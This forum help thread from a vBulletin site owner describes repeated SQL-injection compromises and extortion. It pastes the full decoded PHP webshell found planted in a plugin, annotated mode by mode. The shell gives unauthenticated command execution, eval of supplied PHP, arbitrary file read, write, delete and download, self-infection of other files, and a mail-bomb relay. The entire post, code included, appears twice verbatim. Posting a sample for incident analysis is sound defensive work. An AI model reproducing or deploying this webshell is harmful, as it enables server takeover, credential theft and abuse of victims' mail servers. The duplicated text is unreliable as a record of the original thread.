lcp03o
11-27-2011, 08:37 AM
Hi
My site www.computerforums.org was hacked a few weeks back: the attacker used the search function (searching a group) to perform SQL injection and obtain my password ( http://www.youtube.com/watch?v=ztCFJvzv3NM ).
There was a patch available to stop this threat, so I restored the site from a backup and installed the patch (which did fix the issue — I tested it). But yesterday they hacked me again. So I restored the database from a week back, then deleted all files, uploaded only the latest vBulletin files and performed an upgrade to the latest version of vBulletin, so I now have a fresh, upgraded install. (Caveat: the first compromise was weeks earlier, so a week-old database backup was taken after the attacker already had access and can contain their changes. vBulletin keeps plugin code in the database and executes it at hook points, so replacing every file on disk leaves a database-resident backdoor untouched, and restoring the database brings it back.)
But again today I've been hacked. I believe they have uploaded a shell program, but I cannot find it. I keep changing my passwords every few hours (username + hosting + SQL), but they keep getting back in. Any ideas what I can do??
The hacker has been sending me messages. This is what he has told me; I don't know if the following is true, but this is what he is saying:
-He is using an SQL injection hack to get it
-The vulnerability is in the vBulletin files, all versions (but I uploaded fresh vBulletin files and upgraded) — could it be in the database somewhere?
-he wants money to stop the attacks
--------------- Update added 2011-11-27 10:09:05 UTC (epoch 1322388545) ---------------
I have just found out that I was hacked using the technique described at http://itsecbiz.blogspot.com/2011/07/how-to-shell-vbulletin-408-if-you-got.html . I have decoded the planted file and it reads as follows (decoded PHP — do not run it):
/* DECODED WEBSHELL — malware sample pasted as evidence by the site owner. Do NOT run or deploy.
 * Annotated for capability analysis only; the code is reproduced exactly as posted, including the
 * stray spaces inside identifiers (e.g. "elsei f", "fore ach") that are copy/paste wrapping artefacts.
 * It is pasted without a "<?php" open tag, which fits the poster's statement that it was found in a
 * vBulletin plugin (presumably stored in the database and eval'd at a hook point — which would explain
 * why replacing every file on disk and restoring an older database did not remove it; confirm against
 * the plugin table).
 * Every mode is selected by $_REQUEST['mode'] (GET, POST or cookie) and there is NO authentication of
 * any kind: anyone who knows the hooked URL has full control. Capabilities, by mode:
 *   cmd        - run an arbitrary OS command (system/exec/shell_exec/popen, first one available)
 *   sql        - connect to any MySQL server with attacker-supplied credentials, list databases/tables,
 *                run any query and echo the rows
 *   infect     - rewrite infectFile as sourceFile + "\n" + infectFile, i.e. prepend the shell onto another script
 *   upload     - write an uploaded file into an attacker-chosen directory
 *   ws_read / ws_save / ws_delete / ws_down - read, overwrite, delete or download any path the web server can access
 *   ws_eval    - eval() base64-decoded PHP supplied in the request
 *   ws_mail    - send the same message 'times' times (the code calls it "Mail Bomb")
 *   ws_list / ws_homedir / ws_makedir / ws_rmdir - directory listing, DOCUMENT_ROOT, mkdir with mode, rmdir
 *   ws_remove  - strip an "eval ... ?>" span from a file (looks like a self-removal/cleanup helper)
 * Incident-response consequence: any secret readable by the web server (the forum's database
 * configuration, other sites under the same account) must be assumed stolen, and the host must be
 * checked for further planted files — rotating passwords alone does not evict the attacker. */
@set_time_limit(0);$modearr=array("cmd","sql","infect","upload","ws_ver","ws_remove","ws_read","ws_save","ws_mail","ws_eval","ws_list","ws_homedir","ws_delete","ws_makedir","ws_rmdir","ws_down");$mode=$_REQUEST['mode'];if(in_array($mode,$modearr)){ /* ws_stripslashes: undo magic_quotes escaping so attacker input reaches eval/SQL/mail exactly as sent */ function ws_stripslashes($string){if(get_magic_quotes_gpc() ){return StripSlashes($string);}else{return $string;}}/* cmd: OS command execution via the first available of system/exec/shell_exec/popen */if($mode=="cmd"){$cmd=$_REQUEST['cmd'];if(function_exists('system')){system($cmd);}elsei f(function_exists('exec')){exec($cmd,$output);fore ach($output as $line){echo$line."\n";}}elseif(function_exists('shell_exec')){$output=s hell_exec($cmd);echo$output;}elseif(function_exist s('popen')){$handle=popen($cmd,"r");$read=fread($handle,2096);echo$read;pclose($hand le);}}/* sql: arbitrary MySQL client — host, port, credentials, database and query are all attacker-supplied; result rows are echoed back */if($mode=="sql"){$host=$_REQUEST['host'];$port=$_REQUEST['port'];$username=$_REQUEST['username'];$password=$_REQUEST['password'];$dbname=$_REQUEST['dbname'];$query=$_REQUEST['query'];$link=mysql_connect($host.":".$port,$username,$password) or die('Could not connect: '.mysql_error());if($_REQUEST['sqlCmd']=="getDbs"){$db_list=mysql_list_dbs($link);while($row=mysql_ fetch_object($db_list)){echo"Database: ".$row->Database."\n";}mysql_free_result($db_list);}if($_REQUEST['sqlCmd']=="getTables"){$result=mysql_list_tables($dbname);$num_rows=mys ql_num_rows($result);for($i=0;$i<$num_rows;$i++){echo"Table: ".mysql_tablename($result,$i)."\n";}mysql_free_result($result);}if(isset($query)){my sql_select_db($dbname,$link) or die('Could not select database');$result=mysql_query(ws_stripslashes($qu ery)) or die("nInvalid query: ".mysql_error());while($row=mysql_fetch_assoc($resu lt)){echo"Row {\n";foreach($row as $variable=>$value){echo$variable."=".$value."\n";}echo"\n}\n";}}mysql_close($link);}/* infect: read sourceFile in full, then rewrite infectFile as sourceFile + "\n" + original infectFile — prepends the shell onto another script */if($mode=="infect"){$handle=fopen($_REQUEST["sourceFile"],"r+") or die("Error reading source file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);$handle=fopen($_REQUEST['infectFile'],"r") or die("Error reading infect 
file");$contents2=$contents."\n";while(!feof($handle)){$contents2.=fread($handle,8 192);}fclose($handle);$fp=fopen($_REQUEST['infectFile'],'w') or die("Error writing infect file");$write=fwrite($fp,$contents2);fclose($fp);if($wr ite){echo$_REQUEST['infectFile']." Infected";}}/* upload: drop an uploaded file into whatever directory 'dir' names (only basename() of the client-supplied filename is kept) */if($mode == "upload"){if($_FILES){if (is_uploaded_file($_FILES['file']['tmp_name'])){$uploadfile = basename($_FILES['file']['name']);if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)){echo $uploadfile." has been uploaded!.";}else{echo "Upload Failed!!!";}}}}/* ws_ver: version banner, useful to the operator for confirming the shell is live */if($mode=="ws_ver"){echo"WebShell PHP Server v3.2";}/* ws_remove: delete the span from the first "eval" through the last "?>" in a file and write it back — appears to be a self-removal/cleanup helper */if($mode=="ws_remove"){$handle=fopen($_REQUEST["file"],"r+") or die("Error reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);$contents2=preg_replace('/[<?\s]*eval.*\?>/si','',$contents);if($contents2){$fp=fopen($_REQUE ST['file'],'w') or die("Error writing file");$write=fwrite($fp,$contents2);fclose($fp);if($wr ite){echo"WebShell removed from ".$_REQUEST['file'];}}else{echo"Didnt Find Shell";}}/* ws_read: dump any file the web server can read (e.g. the forum's database configuration) */if($mode=="ws_read"){$handle=fopen($_REQUEST['file'],"r") or die("Error with reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);echo$contents;}/* ws_save: create or overwrite any writable path with request-supplied contents */if($mode=="ws_save"){$contents=ws_stripslashes($_REQUEST["contents"]);$fp=fopen($_REQUEST['file'],'w') or die("Error writing ".$_REQUEST['file']." file");$write=fwrite($fp,$contents);fclose($fp);if($wri te){echo$_REQUEST['file']." 
saved";}}/* ws_mail: send the same message 'times' times from the victim's mail server — spam/mail-bomb relay */if($mode=="ws_mail"){$mailtimes="1";$headers='From: '.ws_stripslashes($_REQUEST['from']).'';while($mailtimes<=$_REQUEST['times']){mail(ws_stripslashes($_REQUEST['to']),ws_stripslashes($_REQUEST['subject']),ws_stripslashes($_REQUEST['msg']),$headers);$mailtimes++;}echo"Mail Bomb Complete";}/* ws_eval: execute arbitrary PHP supplied base64-encoded in the request */if($mode=="ws_eval"){$php=$_REQUEST['php'];eval(base64_decode(ws_stripslashes($php)));}/* ws_list: list files and subdirectories of an attacker-chosen directory */if($m ode=="ws_list"){$dir=$_REQUEST['dir'];$hook=opendir($dir) or die('cant open dir');while(false!==($file=readdir($hook))){$fpath =$dir.$file;if(is_dir($fpath)){if($file!='.'&&$file!='..'){echo"Directory: ".$file."\n";}}if($file!='.'&&$file!='..'&&!is_dir($fpath)){echo"File: ".$file."\n";}}}/* ws_homedir: reveal the web root path */if($mode=="ws_homedir"){echo$_SERVER["DOCUMENT_ROOT"];}/* ws_delete / ws_makedir / ws_rmdir: filesystem housekeeping on attacker-chosen paths */if($mode=="ws_delete"){unlink($_REQUEST['file']) or die('Cant delete file');echo"File Deleted";}if($mode=="ws_makedir"){mkdir($_REQUEST['dir'],$_REQUEST['chmod']) or die('Cant create dir');echo"Directory Created";}if($mode=="ws_rmdir"){rmdir($_REQUEST['dir']) or die('Cant remove dir');echo"Directory Removed";}/* ws_down: stream any readable file as an attachment (exfiltration) */if($mode=="ws_down"){header('Content-type: application/octet-stream');header('Content-Disposition: attachment; filename='.$_REQUEST['file'].'');readfile($_REQUEST['file']);}/* terminate after any handled mode so the host page renders nothing further */die();}
I have disabled the plugin — is this enough?? (Almost certainly not. The decoded code above has no authentication and offers OS command execution (`cmd`), arbitrary file read/write/delete (`ws_read`, `ws_save`, `ws_delete`), arbitrary PHP execution (`ws_eval`) and an `infect` mode that copies itself into other files, so the attacker could have read every credential the web server can see and planted additional backdoors. The plugin should be deleted rather than disabled, every other plugin and any other database-stored code audited, the whole hosting account checked for files not shipped with vBulletin, and every credential the server could read — including the database password in the forum's configuration file — rotated only after the backdoors are gone.)
My site www.computerforums.org was hacked a few weeks back: the attacker used the search function (searching a group) to perform SQL injection and obtain my password ( http://www.youtube.com/watch?v=ztCFJvzv3NM ).
There was a patch available to stop this threat, so I restored the site from a backup and installed the patch (which did fix the issue — I tested it). But yesterday they hacked me again. So I restored the database from a week back, then deleted all files, uploaded only the latest vBulletin files and performed an upgrade to the latest version of vBulletin, so I now have a fresh, upgraded install. (Caveat: the first compromise was weeks earlier, so a week-old database backup was taken after the attacker already had access and can contain their changes. vBulletin keeps plugin code in the database and executes it at hook points, so replacing every file on disk leaves a database-resident backdoor untouched, and restoring the database brings it back.)
But again today I've been hacked. I believe they have uploaded a shell program, but I cannot find it. I keep changing my passwords every few hours (username + hosting + SQL), but they keep getting back in. Any ideas what I can do??
The hacker has been sending me messages. This is what he has told me; I don't know if the following is true, but this is what he is saying:
-He is using an SQL injection hack to get it
-The vulnerability is in the vBulletin files, all versions (but I uploaded fresh vBulletin files and upgraded) — could it be in the database somewhere?
-he wants money to stop the attacks
--------------- Update added 2011-11-27 10:09:05 UTC (epoch 1322388545) ---------------
I have just found out that I was hacked using the technique described at http://itsecbiz.blogspot.com/2011/07/how-to-shell-vbulletin-408-if-you-got.html . I have decoded the planted file and it reads as follows (decoded PHP — do not run it):
/* DECODED WEBSHELL — malware sample pasted as evidence by the site owner. Do NOT run or deploy.
 * Annotated for capability analysis only; the code is reproduced exactly as posted, including the
 * stray spaces inside identifiers (e.g. "elsei f", "fore ach") that are copy/paste wrapping artefacts.
 * It is pasted without a "<?php" open tag, which fits the poster's statement that it was found in a
 * vBulletin plugin (presumably stored in the database and eval'd at a hook point — which would explain
 * why replacing every file on disk and restoring an older database did not remove it; confirm against
 * the plugin table).
 * Every mode is selected by $_REQUEST['mode'] (GET, POST or cookie) and there is NO authentication of
 * any kind: anyone who knows the hooked URL has full control. Capabilities, by mode:
 *   cmd        - run an arbitrary OS command (system/exec/shell_exec/popen, first one available)
 *   sql        - connect to any MySQL server with attacker-supplied credentials, list databases/tables,
 *                run any query and echo the rows
 *   infect     - rewrite infectFile as sourceFile + "\n" + infectFile, i.e. prepend the shell onto another script
 *   upload     - write an uploaded file into an attacker-chosen directory
 *   ws_read / ws_save / ws_delete / ws_down - read, overwrite, delete or download any path the web server can access
 *   ws_eval    - eval() base64-decoded PHP supplied in the request
 *   ws_mail    - send the same message 'times' times (the code calls it "Mail Bomb")
 *   ws_list / ws_homedir / ws_makedir / ws_rmdir - directory listing, DOCUMENT_ROOT, mkdir with mode, rmdir
 *   ws_remove  - strip an "eval ... ?>" span from a file (looks like a self-removal/cleanup helper)
 * Incident-response consequence: any secret readable by the web server (the forum's database
 * configuration, other sites under the same account) must be assumed stolen, and the host must be
 * checked for further planted files — rotating passwords alone does not evict the attacker. */
@set_time_limit(0);$modearr=array("cmd","sql","infect","upload","ws_ver","ws_remove","ws_read","ws_save","ws_mail","ws_eval","ws_list","ws_homedir","ws_delete","ws_makedir","ws_rmdir","ws_down");$mode=$_REQUEST['mode'];if(in_array($mode,$modearr)){ /* ws_stripslashes: undo magic_quotes escaping so attacker input reaches eval/SQL/mail exactly as sent */ function ws_stripslashes($string){if(get_magic_quotes_gpc() ){return StripSlashes($string);}else{return $string;}}/* cmd: OS command execution via the first available of system/exec/shell_exec/popen */if($mode=="cmd"){$cmd=$_REQUEST['cmd'];if(function_exists('system')){system($cmd);}elsei f(function_exists('exec')){exec($cmd,$output);fore ach($output as $line){echo$line."\n";}}elseif(function_exists('shell_exec')){$output=s hell_exec($cmd);echo$output;}elseif(function_exist s('popen')){$handle=popen($cmd,"r");$read=fread($handle,2096);echo$read;pclose($hand le);}}/* sql: arbitrary MySQL client — host, port, credentials, database and query are all attacker-supplied; result rows are echoed back */if($mode=="sql"){$host=$_REQUEST['host'];$port=$_REQUEST['port'];$username=$_REQUEST['username'];$password=$_REQUEST['password'];$dbname=$_REQUEST['dbname'];$query=$_REQUEST['query'];$link=mysql_connect($host.":".$port,$username,$password) or die('Could not connect: '.mysql_error());if($_REQUEST['sqlCmd']=="getDbs"){$db_list=mysql_list_dbs($link);while($row=mysql_ fetch_object($db_list)){echo"Database: ".$row->Database."\n";}mysql_free_result($db_list);}if($_REQUEST['sqlCmd']=="getTables"){$result=mysql_list_tables($dbname);$num_rows=mys ql_num_rows($result);for($i=0;$i<$num_rows;$i++){echo"Table: ".mysql_tablename($result,$i)."\n";}mysql_free_result($result);}if(isset($query)){my sql_select_db($dbname,$link) or die('Could not select database');$result=mysql_query(ws_stripslashes($qu ery)) or die("nInvalid query: ".mysql_error());while($row=mysql_fetch_assoc($resu lt)){echo"Row {\n";foreach($row as $variable=>$value){echo$variable."=".$value."\n";}echo"\n}\n";}}mysql_close($link);}/* infect: read sourceFile in full, then rewrite infectFile as sourceFile + "\n" + original infectFile — prepends the shell onto another script */if($mode=="infect"){$handle=fopen($_REQUEST["sourceFile"],"r+") or die("Error reading source file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);$handle=fopen($_REQUEST['infectFile'],"r") or die("Error reading infect 
file");$contents2=$contents."\n";while(!feof($handle)){$contents2.=fread($handle,8 192);}fclose($handle);$fp=fopen($_REQUEST['infectFile'],'w') or die("Error writing infect file");$write=fwrite($fp,$contents2);fclose($fp);if($wr ite){echo$_REQUEST['infectFile']." Infected";}}/* upload: drop an uploaded file into whatever directory 'dir' names (only basename() of the client-supplied filename is kept) */if($mode == "upload"){if($_FILES){if (is_uploaded_file($_FILES['file']['tmp_name'])){$uploadfile = basename($_FILES['file']['name']);if (move_uploaded_file($_FILES['file']['tmp_name'], $_REQUEST['dir'].$uploadfile)){echo $uploadfile." has been uploaded!.";}else{echo "Upload Failed!!!";}}}}/* ws_ver: version banner, useful to the operator for confirming the shell is live */if($mode=="ws_ver"){echo"WebShell PHP Server v3.2";}/* ws_remove: delete the span from the first "eval" through the last "?>" in a file and write it back — appears to be a self-removal/cleanup helper */if($mode=="ws_remove"){$handle=fopen($_REQUEST["file"],"r+") or die("Error reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);$contents2=preg_replace('/[<?\s]*eval.*\?>/si','',$contents);if($contents2){$fp=fopen($_REQUE ST['file'],'w') or die("Error writing file");$write=fwrite($fp,$contents2);fclose($fp);if($wr ite){echo"WebShell removed from ".$_REQUEST['file'];}}else{echo"Didnt Find Shell";}}/* ws_read: dump any file the web server can read (e.g. the forum's database configuration) */if($mode=="ws_read"){$handle=fopen($_REQUEST['file'],"r") or die("Error with reading file");$contents="";while(!feof($handle)){$contents.=fread($handle,81 92);}fclose($handle);echo$contents;}/* ws_save: create or overwrite any writable path with request-supplied contents */if($mode=="ws_save"){$contents=ws_stripslashes($_REQUEST["contents"]);$fp=fopen($_REQUEST['file'],'w') or die("Error writing ".$_REQUEST['file']." file");$write=fwrite($fp,$contents);fclose($fp);if($wri te){echo$_REQUEST['file']." 
saved";}}/* ws_mail: send the same message 'times' times from the victim's mail server — spam/mail-bomb relay */if($mode=="ws_mail"){$mailtimes="1";$headers='From: '.ws_stripslashes($_REQUEST['from']).'';while($mailtimes<=$_REQUEST['times']){mail(ws_stripslashes($_REQUEST['to']),ws_stripslashes($_REQUEST['subject']),ws_stripslashes($_REQUEST['msg']),$headers);$mailtimes++;}echo"Mail Bomb Complete";}/* ws_eval: execute arbitrary PHP supplied base64-encoded in the request */if($mode=="ws_eval"){$php=$_REQUEST['php'];eval(base64_decode(ws_stripslashes($php)));}/* ws_list: list files and subdirectories of an attacker-chosen directory */if($m ode=="ws_list"){$dir=$_REQUEST['dir'];$hook=opendir($dir) or die('cant open dir');while(false!==($file=readdir($hook))){$fpath =$dir.$file;if(is_dir($fpath)){if($file!='.'&&$file!='..'){echo"Directory: ".$file."\n";}}if($file!='.'&&$file!='..'&&!is_dir($fpath)){echo"File: ".$file."\n";}}}/* ws_homedir: reveal the web root path */if($mode=="ws_homedir"){echo$_SERVER["DOCUMENT_ROOT"];}/* ws_delete / ws_makedir / ws_rmdir: filesystem housekeeping on attacker-chosen paths */if($mode=="ws_delete"){unlink($_REQUEST['file']) or die('Cant delete file');echo"File Deleted";}if($mode=="ws_makedir"){mkdir($_REQUEST['dir'],$_REQUEST['chmod']) or die('Cant create dir');echo"Directory Created";}if($mode=="ws_rmdir"){rmdir($_REQUEST['dir']) or die('Cant remove dir');echo"Directory Removed";}/* ws_down: stream any readable file as an attachment (exfiltration) */if($mode=="ws_down"){header('Content-type: application/octet-stream');header('Content-Disposition: attachment; filename='.$_REQUEST['file'].'');readfile($_REQUEST['file']);}/* terminate after any handled mode so the host page renders nothing further */die();}
I have disabled the plugin — is this enough?? (Almost certainly not. The decoded code above has no authentication and offers OS command execution (`cmd`), arbitrary file read/write/delete (`ws_read`, `ws_save`, `ws_delete`), arbitrary PHP execution (`ws_eval`) and an `infect` mode that copies itself into other files, so the attacker could have read every credential the web server can see and planted additional backdoors. The plugin should be deleted rather than disabled, every other plugin and any other database-stored code audited, the whole hosting account checked for files not shipped with vBulletin, and every credential the server could read — including the database password in the forum's configuration file — rotated only after the backdoors are gone.)